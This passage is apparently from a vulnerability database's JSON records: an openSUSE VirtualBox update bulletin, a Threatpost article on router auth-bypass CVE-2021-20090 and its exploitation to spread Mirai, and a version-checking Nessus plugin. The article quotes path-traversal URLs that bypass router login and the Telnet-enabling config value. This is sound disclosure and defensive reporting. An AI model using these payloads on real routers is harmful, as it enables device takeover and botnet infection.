"virtualbox-guest-source-6.1.26-lp152.2.35.1.noarch.rpm", "packageName": "virtualbox-guest-source"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "noarch", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-host-source-6.1.26-lp152.2.35.1.noarch.rpm", "packageName": "virtualbox-host-source"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}, {"id": "OPENSUSE-SU-2021:1092-1", "hash": "6b6a3d83616e7ff9213e1a94299c8ce0", "type": "suse", "bulletinFamily": "unix", "title": "Security update for virtualbox (important)", "description": "An update that solves four vulnerabilities and has two\n fixes is now available.\n\nDescription:\n\n This update for virtualbox fixes the following issues:\n\n Version bump to 6.1.24 (released July 20 2021 by Oracle)\n\n This is a maintenance release. The following items were fixed and/or\n added:\n\n - Storage: Fixed starting a VM if a device is attached to a VirtIO SCSI\n port higher than 30 (bug #20213)\n - Storage: Improvement to DVD medium change signaling\n - Serial: Fixed a the guest missing interrupts under certain circumstances\n (6.0 regression, bug #18668)\n - Audio: Multiple fixes and enhancements\n - Network: Fixed connectivity issue with virtio-net after resuming VM with\n disconnected link\n - Network: Fixed UDP GSO fragmentation issue with missing 8 bytes of\n payload at the end of the first fragment\n - API: Fixed VM configuration for recent Windows Server versions\n - Extension Pack: Fixed issues with USB webcam pass-through on Linux\n - Host and guest driver: Fix small memory leak (bug #20280)\n - Linux host and guest: Support kernel version 5.13 (bug #20456)\n - Linux host and guest: Introduce support for SUSE SLES/SLED 15 SP3\n kernels (bug #20396)\n - Linux host: Installer will not attempt to build kernel modules if system\n already has them installed and modules versions match current version\n - Guest Additions: Fixed crash on using shared clipboard (bug #19165)\n - Linux Guest Additions: Introduce support for Ubuntu specific kernels\n (bug #20325)\n - Solaris guest: Increased default memory and disk sizes\n - EFI: Support network booting with the E1000 network controller emulation\n - EFI: Stability improvements (bug #20090)\n\n - This release fixes boo#1188535, VUL-0: CVE-2021-2454, boo#1188536,\n VUL-0: CVE-2021-2409, boo#1188537, VUL-0: CVE-2021-2442, and\n boo#1188538, VUL-0: CVE-2021-2443.\n\n - Add vboximg-mount to packaging. boo#1188045.\n - Fix CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT problem with kernel 5.13 as\n shown in boo#1188105.\n - Disable the build of kmp vboxvideo, at least temporarily.\n - Correct WantedBy entry in vboxadd-service\n - Require which for /usr/lib/virtualbox/vboxadd-service\n - fix license packaging, small cruft cleanup (avoid owning directories\n provided by filesystem rpm)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-2021-1092=1", "published": "2021-08-05T01:55:30", "modified": "2021-08-05T01:55:30", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.5, "impactScore": 6.0}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UQOOU7OS5PW5QXPE2UITMUDKYSU7JH54/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2021-2409", "CVE-2021-2442", "CVE-2021-2443", "CVE-2021-2454"], "immutableFields": [], "lastseen": "2021-10-24T14:26:30", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1114.NASL", "OPENSUSE-2021-1092.NASL", "VIRTUALBOX_JUL_2021_CPU.NASL"]}, {"type": "archlinux", "idList": ["ASA-202107-52"]}, {"type": "kaspersky", "idList": ["KLA12238"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1114-1"]}, {"type": "cve", "idList": ["CVE-2021-2454", "CVE-2021-2409", "CVE-2021-2443", "CVE-2021-2442"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-2442", "UB:CVE-2021-2454", "UB:CVE-2021-2443", "UB:CVE-2021-2409"]}, {"type": "zdi", "idList": ["ZDI-21-888"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2021"]}], "modified": "2021-10-23T02:26:22", "rev": 2}, "score": {"value": 4.3, "vector": "NONE", "modified": "2021-10-23T02:26:22", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "python3-virtualbox-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "python3-virtualbox"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "python3-virtualbox-debuginfo-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "python3-virtualbox-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-debuginfo-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-debugsource-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-debugsource"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-devel-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-devel"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-guest-tools-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-guest-tools"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-guest-tools-debuginfo-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-guest-tools-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-guest-x11-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-guest-x11"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-guest-x11-debuginfo-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-guest-x11-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-kmp-debugsource-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-kmp-debugsource"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24_k5.3.18_59.16-lp153.2.6.1", "packageFilename": "virtualbox-kmp-default-6.1.24_k5.3.18_59.16-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-kmp-default"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24_k5.3.18_59.16-lp153.2.6.1", "packageFilename": "virtualbox-kmp-default-debuginfo-6.1.24_k5.3.18_59.16-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-kmp-default-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24_k5.3.18_59.16-lp153.2.6.1", "packageFilename": "virtualbox-kmp-preempt-6.1.24_k5.3.18_59.16-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-kmp-preempt"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24_k5.3.18_59.16-lp153.2.6.1", "packageFilename": "virtualbox-kmp-preempt-debuginfo-6.1.24_k5.3.18_59.16-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-kmp-preempt-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-qt-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-qt"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-qt-debuginfo-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-qt-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-vnc-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-vnc"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-websrv-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-websrv"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-websrv-debuginfo-6.1.24-lp153.2.6.1.x86_64.rpm", "packageName": "virtualbox-websrv-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "noarch", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-guest-desktop-icons-6.1.24-lp153.2.6.1.noarch.rpm", "packageName": "virtualbox-guest-desktop-icons"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "noarch", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-guest-source-6.1.24-lp153.2.6.1.noarch.rpm", "packageName": "virtualbox-guest-source"}, {"OS": "openSUSE Leap", "OSVersion": "15.3", "arch": "noarch", "operator": "lt", "packageVersion": "6.1.24-lp153.2.6.1", "packageFilename": "virtualbox-host-source-6.1.24-lp153.2.6.1.noarch.rpm", "packageName": "virtualbox-host-source"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}], "threatpost": [{"id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "hash": "a65288a79a57019f3bb12f7f60b8ff38", "type": "threatpost", "bulletinFamily": "info", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. For a device in which http://&lt;ip&gt;/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://&lt;ip&gt;/images/..%2findex.htm\n * http://&lt;ip&gt;/js/..%2findex.htm\n * http://&lt;ip&gt;/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. \u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "published": "2021-08-09T19:41:30", "modified": "2021-08-09T19:41:30", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "reporter": "Tara Seals", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://threatpost.com/newsletter-sign/", "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", "https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/", "https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/", "https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar"], "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "immutableFields": [], "lastseen": "2021-08-09T19:54:43", "history": [], "viewCount": 77, "enchantments": {"dependencies": {"references": [{"type": "thn", "idList": ["THN:3907AE12F794F0523BEE196D6543A50F", "THN:E5C91FC48CC9CB51116164A4422D17F8", "THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "cve", "idList": ["CVE-2021-1497", "CVE-2021-22502", "CVE-2021-31755", "CVE-2021-20090", "CVE-2021-22506", "CVE-2021-1498", "CVE-2020-29557"]}, {"type": "attackerkb", "idList": ["AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "seebug", "idList": ["SSV:99329", "SSV:99255"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128", "RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976", "PACKETSTORM:162408"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR"]}, {"type": "zdt", "idList": ["1337DAY-ID-36171", "1337DAY-ID-36357"]}, {"type": "zdi", "idList": ["ZDI-21-154", "ZDI-21-153"]}, {"type": "threatpost", "idList": ["THREATPOST:2E4E0893F2CBC9B0F3E03E94B3BF9490", "THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "THREATPOST:16E5FB90AFD071390CE603F80CFB2D68", "THREATPOST:3F4C590CA1F6027665DF96DF6D651032"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}], "modified": "2021-08-09T19:54:43", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-09T19:54:43", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.threatpost.ThreatpostBulletin", "robots.models.base.Bulletin"]}], "nessus": [{"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "4936bf2a1b79a78a690dae39d3b76721", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-10-15T00:24:02", "history": [{"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "73b1f9e7c4686cf96e2792d708af1b83", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092", "https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-05T12:46:10", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"]}, {"type": "cert", "idList": ["VU:914124"]}], "modified": "2021-08-05T12:46:10", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-08-05T12:46:10", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/04\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": [], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:46:10", "differentElements": ["cpe"], "edition": 1}, {"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "efae2abd1cef6e3e162cafc58ff46ec1", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-04T00:00:00", "cvss": {"score": 7.5, "vector": 